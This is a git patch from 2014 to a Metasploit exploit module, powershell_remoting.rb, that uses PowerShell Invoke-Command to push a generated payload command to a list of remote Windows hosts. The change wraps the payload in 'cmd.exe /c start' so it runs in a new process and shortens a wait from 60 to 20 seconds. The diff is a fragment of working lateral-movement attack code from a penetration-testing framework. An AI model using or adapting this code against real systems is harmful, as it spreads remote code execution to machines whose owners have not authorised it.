From a4b451dbc0ca6e4ef538e5bf85e9ba2bbac5ff5c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 23:36:25 +0000
Subject: [PATCH] Ensure we start in a new conhost/process

---
 modules/exploits/windows/local/powershell_remoting.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index 0561e68a84..622cecd1c5 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Local
 $ResultList=@(#{known_hosts});
 #{ip_list}
 foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
-Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { #{command} }
+Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
 EOF
 
     if datastore['SMBUser']
@@ -108,7 +108,7 @@ EOF
 
     # If the host process terminates too quickly the jobs will die
     # before they spawn in a new process.
-    ps << ";Sleep 60;"
+    ps << ";Sleep 20;"
     ps.gsub!("\n","")
 
     command = generate_psh_command_line({